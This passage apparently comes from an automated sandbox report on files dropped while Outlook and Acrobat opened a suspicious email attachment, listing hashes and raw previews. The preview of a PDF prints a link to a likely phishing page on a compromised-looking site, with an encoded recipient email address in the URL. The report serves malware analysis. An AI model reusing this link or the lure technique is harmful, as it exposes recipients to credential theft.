                                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ce7281d3b450eb3037bc839c5768065b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1724774108000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"da913a67511219924ccc02a5f49b3ed7","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1724774108000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"99eac0b4c2105d2abfb3e132c3ccffc9","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1724774108000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"8eb33a90d23d2bc1c39a8b4498cc0997","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1724774108000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"438da195fc0730bd394633903af4706a","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1724774108000},{"id":"Edit_InApp_Aug2020","info":{"dg":"2dea4046ab0aeb48d6a0fe7118e390cd","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):0.988646799350175
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:74FB603FE45FC66CC0F0A6957EFDD2BC
                                            SHA1:47C30D62CACBB0B96A5DEB119C4D8747007F5578
                                            SHA-256:39ABCA0665B13B1A1DC70C24C132208C1B30886CCAAEF41592E23DF775467EDC
                                            SHA-512:A042E461AC631306DE19F1787CF943274AF025136B1B1664DD4560E66EBDE67BC5792422BC8813653EEF2FCF0D2E9BB0DA5F658B37FEA4AF903352F362A99F78
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):8720
                                            Entropy (8bit):1.3430208011533584
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:0588916E899BB232A0616960B9E295FA
                                            SHA1:76BD15F3EAC90D74F39A6FE67259527553E70849
                                            SHA-256:28B910400ED88910693AAC2B5D783501FBC94BB6D9D552C5694F0AB69814C665
                                            SHA-512:B8061FEAD8E8041467A3E1EA80DCFE590061AA4E059020ABA2EB432B999A44CED49743CD9EE39A3987D2A9BCB46B0A838293C47AD7AB5C63E888641DC49B6849
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:.... .c....._.S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):231348
                                            Entropy (8bit):4.390047195701149
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:AE88827E5A1DC10621A360D0427AF70D
                                            SHA1:D8D33E2AAF7CDA09796D5C080040189D88E20131
                                            SHA-256:680E8E3DFAF8262320B668070E11AFDEC00D6DF0DF47A53F97A71D86EB23A907
                                            SHA-512:4A314146A6B782859AFE378F9F61792B5E85A32EE825EA346ED3D7DF2321FB6E474044768CBD3610F354474DDED5E8D1DA924FC25980D916EF8494E6FF9E7836
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:TH02...... ..c.k........SM01X...,...0..k............IPM.Activity...........h...............h............H..h.........?.....h...........H..h\cal ...pDat...h.~..0...h......h.9r............h........_`Sk...h18r.@...I.lw...h....H...8.Xk...0....T...............d.........2h...............kU.I...........!h.............. h..............#h....8.........$h.......8....."h s.......q....'h..............1h.9r.<.........0h....4....Xk../h....h.....XkH..h....p.........-h .............+h.9r......................... ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):322260
                                            Entropy (8bit):4.000299760592446
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:CC90D669144261B198DEAD45AA266572
                                            SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                            SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                            SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):10
                                            Entropy (8bit):2.6464393446710153
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:95F45504746861EF253B6FBD93093F44
                                            SHA1:F7138098B4F547007C377BE75229221ED7CB4A06
                                            SHA-256:21B9F8ED49A6362D1A7A9ABD3A06D49FA6C39D82E396D8A834AE490DA178FA7D
                                            SHA-512:A185E4B4272DF7EB25C369C0552108E76E9B4D2F6B339CAACF038F97FF7D3116D769B7FC2E366C981BABCB88B9D09FC104CBB85DA232DAB1AD0F40D719AAB7D1
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:1724774095
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):176365
                                            Entropy (8bit):5.287487669118108
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C0DF746B6B87EB81B2C55E8000F992FB
                                            SHA1:BD45242F47BC7471A1A77DAFE0A6B874749DE53C
                                            SHA-256:332C628014C4B32FCF66A7C1C05127BF2487FDE5147114FA409477A40025CFC2
                                            SHA-512:E1DD4A865BE2EE6BE547C72BF69176B2E6787707A274CCBEEB08F41FC517F6634B853658C724B8E6F444E1A4F6D230577ADB0C90DC03D6EB8B88756BE148F402
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-08-27T15:54:54">.. Build: 16.0.18014.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):4616
                                            Entropy (8bit):0.13652830970686947
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:8CD200BC4E85E04A3E6F439B7F57FBDB
                                            SHA1:F7847A0B9FE685242E2CB0A6463FB2C76A668163
                                            SHA-256:2DFDFEDA560D86C99DB53B775A6E466C172F4364221A626D8CE332855C480550
                                            SHA-512:82DB8C51AAFFDD9734176AD84CDB6B8E4482F9276FD0EDF79E3A72465E298DE1C0BA9355D6FDE404D83CA4B810952A806EC8C1373EEC44DC38E6EE57449891B3
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:.... .c.....p.t.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:PDF document, version 1.4, 5 pages
                                            Category:dropped
                                            Size (bytes):0
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:3C9601C0245294F20618A337EAA3E060
                                            SHA1:D0825A1FC011E5A7A925F9ABD9E399A02F724BF5
                                            SHA-256:40D0F5D24826EA4E26F1F3C9A209AC932D6F414119A43F0097CD0C4451576739
                                            SHA-512:6145FCB1F6E825DC6659D8BACF49A37C0D8B17C5287CA31397328F1935654B7EFFE253514199B5697D742EA8309AA1EFC8726F684FC98DE0F6709B25BCF8F820
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:%PDF-1.4.%.... example Generated PDF document http://www.example.com.1 0 obj.<<./F1 2 0 R /F2 3 0 R.>>.endobj.2 0 obj.<<./BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font.>>.endobj.3 0 obj.<<./BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding /Name /F2 /Subtype /Type1 /Type /Font.>>.endobj.4 0 obj.<<./A <<./S /URI /Type /Action /URI (https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t).>> /Border [ 0 0 0 ] /Rect [ 29.34646 754.9731 110.639 770.7231 ] /Subtype /Link /Type /Annot.>>.endobj.5 0 obj.<<./BitsPerComponent 8 /ColorSpace /DeviceRGB /Filter [ /ASCII85Decode /FlateDecode ] /Height 16 /Length 126 /SMask 6 0 R . /Subtype /Image /Type /XObject /Width 16.>>.stream.Gau1';$m:H#Xl;##8+oIe"\8r_PTo3m!M4RRi,q!HQhD?QDui*1HQp-@G/KBQmLK[5*BDB6q]l/!?`_4hrR@NWEdidAOT?u)B7Q5gs2P_rUkR<$U3l$J$'*?DQaH~>endstream.endobj.6 0 obj.<<
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:PDF document, version 1.4, 5 pages
                                            Category:dropped
                                            Size (bytes):5861
                                            Entropy (8bit):5.885659220547372
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:3C9601C0245294F20618A337EAA3E060
                                            SHA1:D0825A1FC011E5A7A925F9ABD9E399A02F724BF5
                                            SHA-256:40D0F5D24826EA4E26F1F3C9A209AC932D6F414119A43F0097CD0C4451576739
                                            SHA-512:6145FCB1F6E825DC6659D8BACF49A37C0D8B17C5287CA31397328F1935654B7EFFE253514199B5697D742EA8309AA1EFC8726F684FC98DE0F6709B25BCF8F820
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:%PDF-1.4.%.... example Generated PDF document http://www.example.com.1 0 obj.<<./F1 2 0 R /F2 3 0 R.>>.endobj.2 0 obj.<<./BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font.>>.endobj.3 0 obj.<<./BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding /Name /F2 /Subtype /Type1 /Type /Font.>>.endobj.4 0 obj.<<./A <<./S /URI /Type /Action /URI (https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t).>> /Border [ 0 0 0 ] /Rect [ 29.34646 754.9731 110.639 770.7231 ] /Subtype /Link /Type /Annot.>>.endobj.5 0 obj.<<./BitsPerComponent 8 /ColorSpace /DeviceRGB /Filter [ /ASCII85Decode /FlateDecode ] /Height 16 /Length 126 /SMask 6 0 R . /Subtype /Image /Type /XObject /Width 16.>>.stream.Gau1';$m:H#Xl;##8+oIe"\8r_PTo3m!M4RRi,q!HQhD?QDui*1HQp-@G/KBQmLK[5*BDB6q]l/!?`_4hrR@NWEdidAOT?u)B7Q5gs2P_rUkR<$U3l$J$'*?DQaH~>endstream.endobj.6 0 obj.<<
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                            SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                            SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                            SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:[ZoneTransfer]..ZoneId=3..
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):246
                                            Entropy (8bit):3.5162684137903053
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:135B2E63CCBFC10CF9A3E337BF507E67
                                            SHA1:C38135A40D70C2994DA98605B3A9BAE1BBE59FDE
                                            SHA-256:01517BC5DEF8B2D82B8A00BF25BF955DC89429919EC82C95BAD13A7DFB538AF3
                                            SHA-512:E612959D16EC914C4FD4A1FBCE66279DFE050D26514ED9DD6BEC07B4E66E3120EBC776FE3228A906B0CE640B6DB97ED79E45C9B2CE538EFE722E9E81E1D82A21
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.0.8./.2.0.2.4. . .1.1.:.5.5.:.1.0. .=.=.=.....
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with very long lines (393)
                                            Category:dropped
                                            Size (bytes):16525
                                            Entropy (8bit):5.353642815103214
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:91F06491552FC977E9E8AF47786EE7C1
                                            SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                            SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                            SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):29752
                                            Entropy (8bit):5.423244881510813
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:F884F97F43390362003C791335AA6689
                                            SHA1:D354A407429BDAA8786A937EEF1165A1CAA39EC6
                                            SHA-256:0AA02C3C244A3B5BEED6D744F0586F6ACA5E7B84AA320E4FAAC5BBF1888823DE
                                            SHA-512:A29CD918EBC8147DD512F51656DB9977B1E371D3014683A902030D671FF95A282B9FE783574ED5AD5BA144E69521CC6AD8E35E796B06BC8291CDBD8EF58EB93D
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):30
                                            Entropy (8bit):1.2389205950315936
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:B72978CD95584F8E3E8C67A7BABCD113
                                            SHA1:84FF43C8B28317D2E9FC5B779F10D9B19C84FC60
                                            SHA-256:6FDC9D489EBBB182242D8F33135B5FE9672BFDFEEA8363455106E652CCDAA10E
                                            SHA-512:9DF38FFB677FF0A19B47A5C2346F5DF38006FCFA91A4E67FD2A245D23817E85BE834B4E1102CB5C07CD20BF439B9D29A9FC578D196B52251897EE95142537EF7
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:..............................
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 14:55:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2673
                                            Entropy (8bit):3.9913714737459665
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:BB91114D4BA2A2F212250EC20A431B19
                                            SHA1:CBD86988AB8FC49E7F582ECD7F5258299578931A
                                            SHA-256:26160D0BB5A8738D0BC282170A6783C0545B0C4A62B7D964E689FF797F2CF122
                                            SHA-512:8712BFDB728B23BD7AF32F979561D3F32400035AFBD92C743B2F6247F452F37629DAC8A659867D32420112741BB7FB6BE819423A9047E196344AB1C4969B491B
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........L7-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 14:55:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2675
                                            Entropy (8bit):4.007850623178941
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:832B00A247CF9B96542A9F14FA220DE5
                                            SHA1:36703B2DBF88E0D92A5BF3118481DCBA9210A2CF
                                            SHA-256:502FF368A169F00F4C4E361B28A9621CFE5B40B6F57ECCE239DD6B4AFB4602D8
                                            SHA-512:2B0D244D40C42019AC275748464861C67A1CEB1C6B0A2A89E38B754257C3D9A3A6E4BFFB57DB3B1C2D8E2135C32CA254999D5796D2B0689C9E30BEE1067CE289
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,.....s......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........L7-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2689
                                            Entropy (8bit):4.01155495277151
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:14E9FC7CD4B531CAC9EF18C7C98F2315
                                            SHA1:BECEBBBAD9D6189DFE2D22E5BFA21837DC2E7CD7
                                            SHA-256:FE00796295423DB4A8B63D7A1E5A6F223EED865CB5CEA32C5ACD1DD3ECB48F7A
                                            SHA-512:A9FD36ABFF81E517CA7BED5B08996F951810BF3ED1F5FD42556FCC313F9A87A9905967833B8FA9CE4328A5ECCDC9A9DF3CA23EF7B2ADC113BBA3EB603099DEAB
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........L7-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 14:55:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2677
                                            Entropy (8bit):4.006210946729927
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:B0BE79E844EAFE0133084B9F5B3187B5
                                            SHA1:735A89065D6A996E7B6AE347155C249E2FAE5296
                                            SHA-256:B6C0C1D70D8151CE63B3784E5A2783950028C1F8091E38F3045B0A4E3F446A9A
                                            SHA-512:9C2ABEE9A8CD4C1B24F68B3F7A2A19931CD26F7F86E319FF93A7DF37639B73F458169C2AAE9C487D632E17CFC65BD34FAD567A59C9919DA18002AB9570D6416B
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,....3.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........L7-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 14:55:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2677
